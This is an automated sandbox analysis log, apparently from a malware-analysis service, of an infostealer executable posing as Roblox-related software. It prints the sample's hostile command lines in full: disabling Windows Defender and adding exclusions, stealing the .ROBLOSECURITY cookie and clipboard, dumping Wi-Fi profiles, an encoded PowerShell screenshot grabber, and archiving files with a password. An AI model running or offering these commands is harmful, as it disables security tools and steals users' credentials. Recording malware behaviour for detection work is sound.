Source: X9g8L63QGs.exe, 00000007.00000002.1712549719.00007FFB0BFAA000.00000004.00000001.01000000.00000010.sdmp | Binary or memory string: OriginalFilenamelibcryptoH vs X9g8L63QGs.exe
Source: X9g8L63QGs.exe, 00000007.00000002.1716259793.00007FFB1D5BC000.00000004.00000001.01000000.0000000E.sdmp | Binary or memory string: OriginalFilenameselect.pyd. vs X9g8L63QGs.exe
Source: X9g8L63QGs.exe, 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: OriginalFilenamevcruntime140.dllT vs X9g8L63QGs.exe
Source: X9g8L63QGs.exe, 00000007.00000002.1714389056.00007FFB0C8E4000.00000004.00000001.01000000.00000005.sdmp | Binary or memory string: OriginalFilenamepython312.dll. vs X9g8L63QGs.exe
Source: X9g8L63QGs.exe, 00000007.00000002.1712826899.00007FFB0C012000.00000004.00000001.01000000.0000000F.sdmp | Binary or memory string: OriginalFilename_ssl.pyd. vs X9g8L63QGs.exe
Source: X9g8L63QGs.exe, 00000007.00000002.1713399942.00007FFB0C1C3000.00000004.00000001.01000000.0000000B.sdmp | Binary or memory string: OriginalFilename_sqlite3.pyd. vs X9g8L63QGs.exe
Source: X9g8L63QGs.exe, 00000007.00000002.1716057701.00007FFB1D34C000.00000004.00000001.01000000.00000013.sdmp | Binary or memory string: OriginalFilename_queue.pyd. vs X9g8L63QGs.exe
Source: X9g8L63QGs.exe, 00000007.00000002.1715396794.00007FFB1BA58000.00000004.00000001.01000000.0000000D.sdmp | Binary or memory string: OriginalFilename_socket.pyd. vs X9g8L63QGs.exe
Source: X9g8L63QGs.exe, 00000007.00000002.1715123647.00007FFB1B714000.00000004.00000001.01000000.00000007.sdmp | Binary or memory string: OriginalFilename_ctypes.pyd. vs X9g8L63QGs.exe
Source: X9g8L63QGs.exe | Binary or memory string: OriginalFilenameksetup.exej% vs X9g8L63QGs.exe
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 3615
Source: libcrypto-3.dll.4.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9991990186771459
Source: libssl-3.dll.4.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9923211348684211
Source: python312.dll.4.dr | Static PE information: Section: UPX1 ZLIB complexity 0.99938957658917
Source: sqlite3.dll.4.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9979301292407108
Source: unicodedata.pyd.4.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9948079718246869
Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@176/56@4/2
Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe | Code function: 97_2_00007FF7080ACAFC GetLastError,FormatMessageW
Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe | Code function: 97_2_00007FF7080AEF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe | Code function: 97_2_00007FF7080DB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx
Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe | Code function: 97_2_00007FF7080B3144 GetDiskFreeSpaceExW
Source: C:\Users\user\Desktop\X9g8L63QGs.exe | File created: C:\Users\user~1\AppData\Local\Temp\_MEI33962
Source: X9g8L63QGs.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: X9g8L63QGs.exe, 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: X9g8L63QGs.exeReversingLabs: Detection: 47%
              Source: X9g8L63QGs.exeVirustotal: Detection: 67%
              Source: X9g8L63QGs.exeString found in binary or memory: /ADd$
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile read: C:\Users\user\Desktop\X9g8L63QGs.exeJump to behavior
              Source: unknown | Process created: C:\Users\user\Desktop\X9g8L63QGs.exe "C:\Users\user\Desktop\X9g8L63QGs.exe"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Users\user\Desktop\X9g8L63QGs.exe "C:\Users\user\Desktop\X9g8L63QGs.exe"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please open roblox', 0, 'Roblox Process Not Found!', 0+16);close()""
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please open roblox', 0, 'Roblox Process Not Found!', 0+16);close()"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbg
AoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES5209.tmp" "c:\Users\user\AppData\Local\Temp\bexzy300\CSC6721B5F011FD4FBD8DF74B583831980.TMP"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
